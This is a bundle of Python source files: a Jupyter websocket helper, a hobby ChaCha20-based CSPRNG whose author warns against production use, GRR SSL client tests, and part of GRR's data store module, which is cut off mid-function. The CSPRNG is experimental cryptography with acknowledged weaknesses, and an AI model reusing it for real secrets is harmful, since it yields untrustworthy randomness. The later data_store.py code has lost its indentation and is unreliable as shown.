    tornado.ioloop.IOLoop.instance().start()
# Removed check for ipykernel version because the old check
# was for 5.0.0 but this works with 4.x too...and 4.x is the first
# version of ipykernel
# Run the websocket server on a background thread; start_server() blocks.
t = Thread(target=start_server, args=())
t.start()
# Setup Comm Channel and websocket
baseObj.glow = GlowWidget(wsport=__SOCKET_PORT, wsuri='/ws')
# NOTE(review): this busy-wait has no timeout — if the browser-side
# javascript never connects, module import hangs here. Confirm intended.
while (not wsConnected):
    time.sleep(0.1)          # wait for websocket to connect
baseObj.trigger()  # start the trigger ping-pong process
# Same justification as above for removing the ipykernel check.
# There was also an IPython version check for >=4, which was
# released in Nov 2015. Ok to stop supporting in 2.019 I think.
async def wsperiodic():
    """Forever drain ws_queue, forwarding each browser event to the widget.

    Events are delivered one at a time because bound events need the loop
    code in GlowWidget.handle_msg.
    """
    while True:
        if ws_queue.qsize() > 0:
            raw = ws_queue.get()
            events = json.loads(raw)
            for event in events:
                # Wrap each event in the message format used by notebook.
                baseObj.glow.handle_msg({'content': {'data': [event]}})
        await asyncio.sleep(0)
# Schedule the websocket-draining coroutine on the kernel's event loop.
# NOTE(review): asyncio.get_event_loop() outside a running loop is
# deprecated in newer Pythons — confirm against supported versions.
loop = asyncio.get_event_loop()
loop.create_task(wsperiodic())
# Dummy name so `from ... import _` has something to bind to.
_ = None
|
csprng.py | #!/usr/bin/env python3
#
# Playing around with creating a CSPRNG
#
# *DO NOT* use this in production for anything that matters
#
# Copyright (c) 2020, Ben Tasker
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# Neither the name of Ben Tasker nor the names of his
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
######################################################################################
from Crypto.Cipher import ChaCha20
from threading import Thread
from queue import Queue
import time
import os
import sys
### Config section
# This is based on the mitigations deployed in Amazon's S2N - https://aws.amazon.com/blogs/opensource/better-random-number-generation-for-openssl-libc-and-linux-mainline/
#
# Mix a little randomness into each number (so that if we somehow end up with different threads running with the same seed we still get different results, preventing leakage between public and private contexts)
#
# Amazon use RDRAND - that's a tad tricky when you're tinkering with this on a Pi that doesn't have that instruction.
#
# Enabling this means that you'll no longer be generating deterministic output
prediction_resistant=False

# Bytes can be pulled out via pipe - this defines where that FIFO is created
pipe_name="/tmp/csprng"

# How often (in seconds) should we try to re-seed?
reseed_interval=0.2

# Where seed bytes are read from. This is created by another of my scripts.
# Could also be /dev/random
seed_source="/tmp/randentropy"

# How many threads should we have generating random numbers?
rng_threads=2
### RNG Related functions
def ChaChaMe(key, nonce, plaintext):
    '''
    Encrypt `plaintext` (normally a block of random bytes) with ChaCha20
    under the supplied key and nonce, returning the ciphertext.
    '''
    return ChaCha20.new(key=key, nonce=nonce).encrypt(plaintext)
def iterate_with(key,plaintext,itercount,prediction_resistant,spare):
    '''
    Iteratively reencrypt a keyset with itself - itercount iterations.

    Args:
        key: 32-byte ChaCha20 key for this round.
        plaintext: bytes to start the encryption chain from.
        itercount: loop bound. NOTE(review): range(1, itercount) performs
            itercount - 1 iterations, not itercount — downstream byte-count
            comments ("46 * 64bytes") appear to assume this behaviour, so it
            is documented rather than changed. Confirm intent.
        prediction_resistant: when True, mix fresh random bytes into each block.
        spare: extra key material from the previous round (or False), used to
            mutate the key halfway through.

    Returns:
        (buffer1, plaintext): the list of ciphertext blocks produced, and the
        final block (used as the next round's starting plaintext).
    '''
    buffer1 = []
    # To help reduce the efficiency of backtracking, we'll mutate the key 1/2 way through
    mutate_point = int(itercount/2)
    # 48 iterations
    for i in range(1,itercount):
        # Use counter-mode to generate our nonce for each encryption
        #
        # When this iteration loop is next called, the key will have changed
        nonce=format(i,'012').encode('utf-8')
        if prediction_resistant:
            plaintext = mix_with_rand(plaintext)
        # If for some reason our key is < 32 bytes then skip
        #
        # This shouldn't but might happen as the result of a mutate,
        # or because prediction_resistance has given us too few bytes back
        if len(key) < 32:
            continue
        # Trigger the encryption
        plaintext = ChaChaMe(key,nonce,plaintext)
        if i == mutate_point and spare:
            # Mutate the key using some of the "spare" data from the last key generation round
            newkey = xor_bytes(key,spare[32:])
            del key
            del spare
            key = newkey
            del newkey
        buffer1.append(plaintext)
    return buffer1, plaintext
def mix_with_rand(plaintext):
    '''
    XOR the input with 32 freshly fetched random bytes (prediction resistance).
    '''
    fresh = bytefetch(32)
    return xor_bytes(fresh, plaintext)
def split_seed(randbytes):
    '''
    Split a 512-bit seed bytestring into (key, seed-input).

    The key is the first 32 bytes; the full input is returned unchanged as
    the seed material. (The original author noted it feels risky to reuse
    the first 32 bytes in both roles but couldn't quite rationalise why;
    changing it would also require trimming bytes in rng_thread.)
    '''
    key = randbytes[0:32]
    return key, randbytes
def xor_bytes(b1, b2):
    '''Bitwise-XOR two bytestrings, truncated to the shorter of the two.'''
    return bytes(x ^ y for x, y in zip(b1, b2))
def select_key_from_bytes(inputbytes1, inputbytes2):
    '''
    Derive the next 32-byte key, plus "spare" key material, from two blocks
    of previously generated output.
    '''
    k1, extra1 = split_seed(inputbytes1)
    k2, extra2 = split_seed(inputbytes2)
    # XOR the two 32-byte halves together to form the new key.
    newkey = xor_bytes(k1, k2)
    # Combine the "spare" bytes too: these later mutate the key mid-round to
    # help prevent backtracking.
    return newkey, xor_bytes(extra1, extra2)
def rng_thread(initial_seed,seed_queue,data_queue,reseed_interval):
    '''
    The RNG thread - this is where the numbers are actually generated.

    Args:
        initial_seed: 64 bytes used to derive the first key/plaintext pair.
        seed_queue: queue of fresh 64-byte seeds (fed by seeder_thread).
        data_queue: output queue of generated random bytes (drained by
            reader_thread); oldest entry is dropped when full.
        reseed_interval: minimum seconds between reseeds from seed_queue.

    Runs forever; intended to be the target of a daemon/worker Thread.
    '''
    key,plaintext=split_seed(initial_seed)
    start=time.time()
    spare=False
    while True:
        # Set off the initial iteration (48 iterations)
        buffer1, plaintext = iterate_with(key,plaintext,48,prediction_resistant,spare)
        # Clear the original and then use the first 2 entries to create the next key
        del key
        key,spare=select_key_from_bytes(buffer1[0],buffer1[1])
        # Clear some space on the queue if necessary
        if data_queue.full():
            d = data_queue.get()
            del d
        # use the rest of the chain as our bytes
        # we did 48 iterations, and are using 2 for a key, leaving
        # 46 * 64bytes being pushed into the queue
        data_queue.put(b"".join(buffer1[2:-1]))
        # Next plaintext is the last block
        plaintext=buffer1[-1]
        # Clear the old one out
        del buffer1
        # Periodically replace key/plaintext with a fresh external seed.
        if (time.time() - start) > reseed_interval and seed_queue.qsize() > 0:
            try:
                newseed = seed_queue.get(True,0.1)
                if newseed:
                    key,plaintext = split_seed(newseed)
                    start = time.time()
            # NOTE(review): bare except also swallows KeyboardInterrupt etc. —
            # deliberate best-effort reseed, so only logged here.
            except:
                print("{} unable to read a seed".format(time.time()))
                pass
### Pipe/Output related functions
def reader_thread(q,pipe):
    '''
    Read random data in from the queue and write it out to the pipe.

    Args:
        q: queue of generated random bytes (filled by rng_thread).
        pipe: filesystem path of the FIFO to create/write to.

    This will obviously block whenever there's no consumer connected to the
    pipe; runs forever and is intended to be a Thread target.
    '''
    if not os.path.exists(pipe):
        os.mkfifo(pipe)
    # Opening a FIFO for writing blocks until a reader connects.
    pipeout = os.open(pipe, os.O_WRONLY)
    while True:
        if not pipeout:
            try:
                # If something failed, re-open the pipe
                pipeout = os.open(pipe, os.O_WRONLY)
            except:
                print("{} Failed to open pipe".format(time.time()))
                time.sleep(0.2)
                continue
        # Pull some random data off the queue
        mixed = q.get()
        if not mixed:
            # Don't try and write if we haven't got anything
            time.sleep(0.2)
            continue
        # Now try and write it to the pipe (here is where we'll block)
        try:
            os.write(pipeout, mixed)
        except Exception as e:
            #print(e)
            try:
                # Something went wrong, lets not litter the place with filehandles
                os.close(pipeout)
            except:
                # The client probably went away, in which case os.close will have thrown "Bad File Descriptor"
                pipeout=False
            continue
### Seed Fetcher
def get_random_seed(seed_source):
    '''
    Fetch 64 random bytes (512 bits) to be used as a seed.

    Args:
        seed_source: path to the entropy source (a FIFO or /dev/random).

    Returns:
        64 bytes on success, False on any failure. A short read now also
        returns False: the original returned however many bytes os.read()
        happened to deliver, and a short seed yields a key shorter than 32
        bytes, which iterate_with() silently skips — degenerating the RNG.

    This function will block if the source isn't able to provide bytes;
    that's sort of deliberate.
    '''
    try:
        f = os.open(seed_source, os.O_RDONLY)
    except OSError:
        return False
    try:
        bstring = os.read(f, 64)  # os.read may legally return fewer bytes
    except OSError:
        return False
    finally:
        os.close(f)
    if len(bstring) != 64:
        return False
    return bstring
def seeder_thread(seed_queue,seed_interval,seed_source):
    '''
    Fetch a seed value and push it onto the seed queue periodically.

    Args:
        seed_queue: bounded queue consumed by the rng threads; the oldest
            entry is dropped when full so fresh seeds are never blocked.
        seed_interval: reseed interval in seconds; this thread polls at
            twice that rate.
        seed_source: path handed to get_random_seed().

    Runs forever; intended to be a Thread target.
    '''
    pause = seed_interval / 2
    while True:
        data = get_random_seed(seed_source)
        if data:
            if seed_queue.full():
                d = seed_queue.get()
                del d
            seed_queue.put(data)
        time.sleep(pause)
### Main
# New seed data will get pushed to a queue
seed_queue=Queue(rng_threads*2)
# Generated random bytes will also find their way onto a queue
data_queue=Queue(rng_threads*100)
# If prediction resistance is enabled, try and enable RDRAND. Fall back on `get_random_bytes` if not
if prediction_resistant:
    fail=False
    try:
        import rdrand
    except:
        fail=True
    # `bytefetch` is the module-wide hook used by mix_with_rand()
    if not fail and rdrand.HAS_RAND:
        bytefetch = rdrand.rdrand_get_bytes
    else:
        from Crypto.Random import get_random_bytes
        bytefetch = get_random_bytes
        print("WARN: Using Crypto.Random instead of RDRAND for prediction resistance - this is insecure")
# Get our initial seed (only used to verify the source works; each rng
# thread fetches its own seed below)
randomdata = get_random_seed(seed_source)
if not randomdata:
    print("Error - failed to fetch intial seed")
    sys.exit(1)
# Create the reader thread and seeder threads
readthread = Thread(target=reader_thread,args=(data_queue,pipe_name))
seedthread = Thread(target=seeder_thread,args=(seed_queue,reseed_interval,seed_source))
# Create the RNG threads
threads=[]
for i in range(0,rng_threads):
    # Each should be started with a different seed
    randomdata = get_random_seed(seed_source)
    threads.append(Thread(target=rng_thread,args=(randomdata,seed_queue,data_queue,reseed_interval)))
    threads[i].start()
print("Starting")
readthread.start()
seedthread.start()
# Block forever: all worker threads run infinite loops.
readthread.join()
seedthread.join()
|
ssl_test.py | #!/usr/bin/env python
"""Tests for API client + HTTPS server integration."""
import datetime
import io
import os
import socket
import SocketServer
import threading
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
from http import server as http_server
import portpicker
import requests
from grr_api_client import api as grr_api
from grr_response_core.lib import flags
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import webauth
from grr_response_server.gui import wsgiapp_testlib
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import test_lib
class ApiSslServerTestBase(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
  """Base fixture: runs the AdminUI over HTTPS with a self-signed cert."""

  def setUp(self):
    super(ApiSslServerTestBase, self).setUp()

    # Generate a throwaway RSA key and write it out for the server config.
    key = rdf_crypto.RSAPrivateKey.GenerateKey()
    key_path = os.path.join(self.temp_dir, "key.pem")
    with open(key_path, "wb") as f:
      f.write(key.AsPEM())

    # Build a self-signed certificate for "localhost", valid for one day.
    subject = issuer = x509.Name([
        x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
    ])
    cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
        issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
            x509.random_serial_number()).not_valid_before(
                datetime.datetime.utcnow()).not_valid_after(
                    datetime.datetime.utcnow() +
                    datetime.timedelta(days=1)).add_extension(
                        x509.SubjectAlternativeName(
                            [x509.DNSName(u"localhost")]),
                        critical=False,
                    ).sign(key.GetRawPrivateKey(), hashes.SHA256(),
                           backends.default_backend())

    self.cert_path = os.path.join(self.temp_dir, "certificate.pem")
    with open(self.cert_path, "wb") as f:
      f.write(cert.public_bytes(serialization.Encoding.PEM))

    # Point the AdminUI at the generated key/cert and switch SSL on before
    # the server thread starts.
    self.config_overrider = test_lib.ConfigOverrider({
        "AdminUI.enable_ssl": True,
        "AdminUI.ssl_key_file": key_path,
        "AdminUI.ssl_cert_file": self.cert_path,
    })
    self.config_overrider.Start()

    # Start the HTTPS server on a free port and wait until it is serving.
    self.port = portpicker.PickUnusedPort()
    self.thread = wsgiapp_testlib.ServerThread(self.port)
    self.thread.StartAndWaitUntilServing()

    api_auth_manager.APIACLInit.InitApiAuthManager()
    self.token.username = "api_test_robot_user"
    webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)

    self.endpoint = "https://localhost:%s" % self.port

  def tearDown(self):
    super(ApiSslServerTestBase, self).tearDown()
    self.config_overrider.Stop()
    # Signal the server thread to leave its serving loop.
    self.thread.keep_running = False
class ApiSslE2ETestMixin(object):
  """End-to-end checks shared by all working SSL client configurations."""

  def testGetClientWorks(self):
    # By testing GetClient we test a simple GET method.
    urn = self.SetupClient(0)
    client = self.api.Client(client_id=urn.Basename()).Get()
    self.assertEqual(client.client_id, urn.Basename())

  def testSearchClientWorks(self):
    # By testing SearchClients we test an iterator-based API method.
    found = list(self.api.SearchClients(query="."))
    self.assertEqual(found, [])

  def testPostMethodWorks(self):
    # CreateFlow exercises a POST method.
    urn = self.SetupClient(0)
    flow_args = processes.ListProcessesArgs(
        filename_regex="blah", fetch_binaries=True)
    client_ref = self.api.Client(client_id=urn.Basename())
    started_flow = client_ref.CreateFlow(
        name=processes.ListProcesses.__name__,
        args=flow_args.AsPrimitiveProto())
    self.assertTrue(started_flow.client_id)

  def testDownloadingFileWorks(self):
    # Blob download exercises the streaming path.
    urn = self.SetupClient(0)
    fixture_test_lib.ClientFixture(urn, self.token)
    buf = io.BytesIO()
    self.api.Client(client_id=urn.Basename()).File(
        "fs/tsk/c/bin/rbash").GetBlob().WriteToStream(buf)
    self.assertTrue(buf.getvalue())
class ApiSslWithoutCABundleTest(ApiSslServerTestBase):
  """Without a CA bundle, the self-signed server cert must be rejected."""

  def testConnectionFails(self):
    urn = self.SetupClient(0)
    client_api = grr_api.InitHttp(api_endpoint=self.endpoint)
    with self.assertRaises(requests.exceptions.SSLError):
      client_api.Client(client_id=urn.Basename()).Get()
class ApiSslWithEnvVarWithoutMergingTest(ApiSslServerTestBase):
  """With trust_env disabled, env-provided CA config is ignored and SSL fails."""

  def testConnectionFails(self):
    urn = self.SetupClient(0)
    client_api = grr_api.InitHttp(api_endpoint=self.endpoint, trust_env=False)
    with self.assertRaises(requests.exceptions.SSLError):
      client_api.Client(client_id=urn.Basename()).Get()
class ApiSslWithConfigurationInEnvVarsE2ETest(ApiSslServerTestBase,
                                              ApiSslE2ETestMixin):
  """E2E tests with the CA bundle supplied via REQUESTS_CA_BUNDLE."""

  def setUp(self):
    super(ApiSslWithConfigurationInEnvVarsE2ETest, self).setUp()
    # Snapshot the whole environment so tearDown can restore it exactly.
    self.prev_environ = dict(os.environ)
    os.environ["REQUESTS_CA_BUNDLE"] = self.cert_path
    self.api = grr_api.InitHttp(api_endpoint=self.endpoint)

  def tearDown(self):
    super(ApiSslWithConfigurationInEnvVarsE2ETest, self).tearDown()
    # Restore the pre-test environment verbatim.
    os.environ.clear()
    os.environ.update(self.prev_environ)
class ApiSslWithWithVerifyFalseE2ETest(ApiSslServerTestBase,
                                       ApiSslE2ETestMixin):
  """E2E tests with certificate verification disabled entirely."""

  def setUp(self):
    super(ApiSslWithWithVerifyFalseE2ETest, self).setUp()
    self.api = grr_api.InitHttp(api_endpoint=self.endpoint, verify=False)


class ApiSslWithWithVerifyPointingToCABundleTest(ApiSslServerTestBase,
                                                 ApiSslE2ETestMixin):
  """E2E tests passing the self-signed cert directly as the CA bundle."""

  def setUp(self):
    super(ApiSslWithWithVerifyPointingToCABundleTest, self).setUp()
    self.api = grr_api.InitHttp(
        api_endpoint=self.endpoint, verify=self.cert_path)


class Proxy(http_server.SimpleHTTPRequestHandler):
  """Fake HTTP proxy that records CONNECT request lines instead of tunneling."""

  # Class-level (shared) list: accumulates request lines across all handler
  # instances so tests can inspect what the client sent.
  requests = []

  def do_CONNECT(self):  # pylint: disable=invalid-name
    # Record the CONNECT line; the tunnel is deliberately never established,
    # so the client's request ultimately fails with a connection error.
    self.__class__.requests.append(self.requestline)


class TCPServerV6(SocketServer.TCPServer):
  """TCPServer variant bound over IPv6 (the test proxy listens on "::")."""

  # NOTE(review): `SocketServer` is the Python 2 module name; on Python 3 the
  # module is `socketserver`. This file mixes py2/py3 imports (presumably via
  # the `future` compatibility layer used elsewhere in the project) — confirm
  # against the supported runtimes.
  address_family = socket.AF_INET6
class ApiSslProxyTest(ApiSslServerTestBase):
  """Checks that the client routes HTTPS requests through a configured proxy."""

  def setUp(self):
    super(ApiSslProxyTest, self).setUp()
    self.proxy_port = portpicker.PickUnusedPort()
    self.proxy_server = TCPServerV6(("::", self.proxy_port), Proxy)
    # NOTE(review): the serve_forever thread is neither daemonized nor
    # joined; tearDown's shutdown() unblocks it, but confirm no leak on
    # setUp failure.
    threading.Thread(target=self.proxy_server.serve_forever).start()

  def tearDown(self):
    super(ApiSslProxyTest, self).tearDown()
    self.proxy_server.shutdown()
    self.proxy_server.server_close()

  def testProxyConnection(self):
    client_urn = self.SetupClient(0)
    api = grr_api.InitHttp(
        api_endpoint=self.endpoint,
        proxies={"https": "localhost:%d" % self.proxy_port})
    # The fake proxy records the CONNECT but never tunnels, so the call fails.
    with self.assertRaises(requests.exceptions.ConnectionError):
      api.Client(client_id=client_urn.Basename()).Get()
    # CONNECT request should point to GRR SSL server.
    self.assertEqual(Proxy.requests,
                     ["CONNECT localhost:%d HTTP/1.0" % self.port])
def main(argv):
  # Delegate to the GRR test runner.
  test_lib.main(argv)


if __name__ == "__main__":
  flags.StartMain(main)
|
data_store.py | #!/usr/bin/env python
"""The main data store abstraction.
The data store is responsible for storing AFF4 objects permanently. This file
defines the basic interface of the data store, but there is no specific
implementation. Concrete implementations should extend the DataStore class and
provide non-abstract methods.
The data store is essentially an object store. Objects have a subject (a unique
identifying name) and a series of arbitrary attributes. Attributes also have a
name and can only store a number of well defined types.
Some data stores have internal capability to filter and search for objects based
on attribute conditions. Due to the variability of this capability in
implementations, the Filter() class is defined inside the DataStore class
itself. This allows callers to create a data store specific filter
implementation, with no prior knowledge of the concrete implementation.
In order to accommodate for the data store's basic filtering capabilities it is
important to allow the data store to store attribute values using the most
appropriate types.
The currently supported data store storage types are:
- Integer
- Bytes
- String (unicode object).
This means that if one stores an attribute containing an integer, and then
retrieves this attribute, the data store guarantees that an integer is
returned (although it may be stored internally as something else).
More complex types should be encoded into bytes and stored in the data store as
bytes. The data store can then treat the type as an opaque type (and will not be
able to filter it directly).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import abc
import atexit
import collections
import logging
import random
import sys
import time
from absl import flags
from future.builtins import str
from future.utils import iteritems
from future.utils import iterkeys
from future.utils import with_metaclass
from typing import Optional
from typing import Text
from grr_response_core import config
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import registry
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.util import collection
from grr_response_core.lib.util import precondition
from grr_response_core.stats import stats_collector_instance
from grr_response_core.stats import stats_utils
from grr_response_server import access_control
from grr_response_server import blob_store
from grr_response_server import db
from grr_response_server.databases import registry_init
from grr_response_server.rdfvalues import flow_runner as rdf_flow_runner
flags.DEFINE_bool("list_storage", False, "List all storage subsystems present.")

# TODO(user): Move access to functions that never return None but raise
# instead.

# A global data store handle (legacy AFF4 store); set during initialization.
DB = None  # type: Optional[DataStore]

# The global relational db handle.
REL_DB = None  # type: Optional[db.Database]

# The global blobstore handle.
BLOBS = None  # type: Optional[blob_store.BlobStore]
def RelationalDBWriteEnabled():
  """Returns True if writes to a relational database are enabled.

  Writes are considered enabled whenever the global REL_DB handle is set.
  """
  return bool(REL_DB)
def RelationalDBReadEnabled(category=None):
  """Returns True if reads from a relational database are enabled.

  Args:
    category: string identifying the category. Useful when a large piece of
      functionality gets converted to REL_DB iteratively, step by step and
      when enabling already implemented steps may break the rest of the
      system. For example - reading single approvals is implemented, but
      listing them is not.

  Returns:
    True if reads are enabled, False otherwise.
  """
  enabled = config.CONFIG["Database.useForReads"]
  if not category:
    return enabled
  # Category-specific reads additionally require their own config switch.
  return enabled and config.CONFIG["Database.useForReads.%s" % category]
def RelationalDBFlowsEnabled():
  """Returns True if relational flows are enabled.

  Even with RelationalDBReadEnabled() returning True, this can be False.

  Returns: True if relational flows are enabled.
  """
  return config.CONFIG["Database.useRelationalFlows"]


def AFF4Enabled():
  """Returns True if the legacy AFF4 data store is enabled in the config."""
  return config.CONFIG["Database.aff4_enabled"]
# There are stub methods that don't return/yield as indicated by the docstring.
# pylint: disable=g-doc-return-or-yield


class Error(stats_utils.CountingExceptionMixin, Exception):
  """Base class for all exceptions in this module."""
  pass


class TimeoutError(Exception):
  """Raised when an access times out.

  NOTE(review): shadows the builtin TimeoutError and does not inherit from
  this module's Error base — callers may rely on either property, so it is
  left as-is.
  """
  pass


class DBSubjectLockError(Error):
  """Raised when a lock fails to commit."""
  counter = "grr_commit_failure"


# This token will be used by default if no token was provided.
default_token = None
def GetDefaultToken(token):
  """Returns the provided token or the default token.

  Args:
    token: A token or None.

  Returns:
    `token` itself when provided, otherwise the module-level default_token.

  Raises:
    access_control.UnauthorizedAccess: if the resulting value is not an
      ACLToken (e.g. nothing was provided and no default is configured).
  """
  chosen = default_token if token is None else token
  if not isinstance(chosen, access_control.ACLToken):
    raise access_control.UnauthorizedAccess(
        "Token is not properly specified. It should be an "
        "instance of grr.lib.access_control.ACLToken()")
  return chosen
# This represents a record stored in a queue/collection. The attributes are:
#   queue_id: Id of the queue this record is stored in.
#   timestamp: Timestamp this record was stored at.
#   suffix: A random number that is used to differentiate between records that
#     have the same timestamp.
#   subpath: Queues store records in different subpaths, this attribute
#     specifies which one was used to store the record.
#   value: The actual data that the record contains.
Record = collections.namedtuple(
    "Record", ["queue_id", "timestamp", "suffix", "subpath", "value"])
class MutationPool(object):
  """A mutation pool.

  This is a pool to group a number of mutations together and apply
  them at the same time. Note that there are no guarantees about the
  atomicity of the mutations. Currently, no mutation will be applied
  before Flush() is called on the pool. If datastore errors occur
  during application, some mutations might be applied while others are
  not.
  """

  def __init__(self):
    # Pending operations, accumulated until Flush() applies them via DB.
    self.delete_subject_requests = []
    self.set_requests = []
    self.delete_attributes_requests = []
    self.new_notifications = []
  def DeleteSubjects(self, subjects):
    """Queues deletion of several subjects (applied on Flush)."""
    self.delete_subject_requests.extend(subjects)

  def DeleteSubject(self, subject):
    """Queues deletion of a single subject (applied on Flush)."""
    self.delete_subject_requests.append(subject)

  def MultiSet(self,
               subject,
               values,
               timestamp=None,
               replace=True,
               to_delete=None):
    """Queues setting several attribute values on a subject (applied on Flush)."""
    self.set_requests.append((subject, values, timestamp, replace, to_delete))

  def Set(self, subject, attribute, value, timestamp=None, replace=True):
    """Queues setting a single attribute value; delegates to MultiSet."""
    self.MultiSet(
        subject, {attribute: [value]}, timestamp=timestamp, replace=replace)

  def DeleteAttributes(self, subject, attributes, start=None, end=None):
    """Queues deletion of attributes in [start, end] on a subject."""
    self.delete_attributes_requests.append((subject, attributes, start, end))
def Flush(self):
"""Flushing actually applies all the operations in the pool."""
DB.DeleteSubjects(self.delete_subject_requests, sync=False)
for req in self.delete_attributes_requests:
subject, attributes, start, end = req
DB.DeleteAttributes(subject, attributes, start=start, end=end, sync=False)
for req in self.set_requests:
subject, values, timestamp, replace, to_delete = req
DB.MultiSet(
subject,
values,
timestamp=timestamp,
replace=replace,
to_delete=to_delete,
sync=False)
if (self.delete_subject_requests or self.delete_attributes_requests or
self.set_requests):
DB.Flush()
for queue, notifications in self.new_notifications:
DB.CreateNotifications(queue, notifications)
self.new_notifications = []
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Flush()
def Size(self):
return (len(self.delete_subject_requests) + len(self.set_requests) + len(
self.delete_attributes_requests))
# Notification handling
def CreateNotifications(self, queue, notifications):
self.new_notifications.append((queue, notifications))
def CollectionAddItem(self,
collection_id,
item,
timestamp,
suffix=None,
replace=True):
result_subject, timestamp, suffix = DataStore.CollectionMakeURN(
collection_id, timestamp, suffix=suffix)
self.Set(
result_subject,
DataStore.COLLECTION_ATTRIBUTE,
item.SerializeToString(),
timestamp=timestamp,
replace=replace)
return result_subject, timestamp, suffix
def CollectionAddIndex(self, collection_id, index, timestamp, suffix):
self.Set(
collection_id,
DataStore.COLLECTION_INDEX_ATTRIBUTE_PREFIX + "%08x" % index,
"%06x" % suffix,
timestamp=timestamp,
replace=True)
def CollectionAddStoredTypeIndex(self, collection_id, stored_type):
self.Set(
collection_id,
"%s%s" % (DataStore.COLLECTION_VALUE_TYPE_PREFIX, stored_type),
1,
timestamp=0)
def CollectionDelete(self, collection_id):
for subject, _, _ in DB.ScanAttribute(
str(collection_id.Add("Results")), DataStore.COLLECTION_ATTRIBUTE):
self.DeleteSubject(subject)
if self.Size() > 50000:
self.Flush()
def QueueAddItem(self, queue_id, item, timestamp):
result_subject, timestamp, _ = DataStore.CollectionMakeURN(
queue_id, timestamp, suffix=None, subpath="Records")
self.Set(
result_subject,
DataStore.COLLECTION_ATTRIBUTE,
item.SerializeToString(),
timestamp=timestamp)
def QueueClaimRecords(self,
queue_id,
item_rdf_type,
limit=10000,
timeout="30m",
start_time=None,
record_filter=lambda x: False,
max_filtered=1000):
"""Claims records from a queue. See server/aff4_objects/queue.py."""
now = rdfvalue.RDFDatetime.Now()
expiration = rdfvalue.RDFDatetime.Now() + rdfvalue.Duration(timeout)
after_urn = None
if start_time:
after_urn, _, _ = DataStore.CollectionMakeURN(
queue_id, start_time.AsMicrosecondsSinceEpoch(), 0, subpath="Records")
results = []
filtered_count = 0
for subject, values in DB.ScanAttributes(
str(queue_id.Add("Records")),
[DataStore.COLLECTION_ATTRIBUTE, DataStore.QUEUE_LOCK_ATTRIBUTE],
max_records=4 * limit,
after_urn=after_urn):
if DataStore.COLLECTION_ATTRIBUTE not in values:
# Unlikely case, but could happen if, say, a thread called RefreshClaims
# so late that another thread already deleted the record. Go ahead and
# clean this up.
self.DeleteAttributes(subject, [DataStore.QUEUE_LOCK_ATTRIBUTE])
continue
if DataStore.QUEUE_LOCK_ATTRIBUTE in values:
timestamp = rdfvalue.RDFDatetime.FromMicrosecondsSinceEpoch(
values[DataStore.QUEUE_LOCK_ATTRIBUTE][1])
if timestamp > now:
continue
rdf_value = item_rdf_type.FromSerializedString(
values[DataStore.COLLECTION_ATTRIBUTE][1])
if record_filter(rdf_value):
filtered_count += 1
if max_filtered and filtered_count >= max_filtered:
break
continue
results.append(
Record(
queue_id=queue_id,
timestamp=values[DataStore.COLLECTION_ATTRIBUTE][0],
suffix=int(subject[-6:], 16),
subpath="Records",
value=rdf_value))
self.Set(subject, DataStore.QUEUE_LOCK_ATTRIBUTE, expiration)
filtered_count = 0
if len(results) >= limit:
break
return results
def QueueRefreshClaims(self, records, timeout="30m"):
expiration = rdfvalue.RDFDatetime.Now() + rdfvalue.Duration(timeout)
for record in records:
subject, _, _ = DataStore.CollectionMakeURN(
record.queue_id, record.timestamp, record.suffix, record.subpath)
self.Set(subject, DataStore.QUEUE_LOCK_ATTRIBUTE, expiration)
def QueueDeleteRecords(self, records):
for record in records:
subject, _, _ = DataStore.CollectionMakeURN(
record.queue_id, record.timestamp, record.suffix, record.subpath)
self.DeleteAttributes(
subject,
[DataStore.QUEUE_LOCK_ATTRIBUTE, DataStore.COLLECTION_ATTRIBUTE])
def QueueReleaseRecords(self, records):
for record in records:
subject, _, _ = DataStore.CollectionMakeURN(
record.queue_id, record.timestamp, record.suffix, record.subpath)
self.DeleteAttributes(subject, [DataStore.QUEUE_LOCK_ATTRIBUTE])
def QueueDeleteTasks(self, queue, tasks):
"""Removes the given tasks from the queue."""
predicates = []
for task in tasks:
task_id = getattr(task, "task_id", None) or int(task)
predicates.append(DataStore.QueueTaskIdToColumn(task_id))
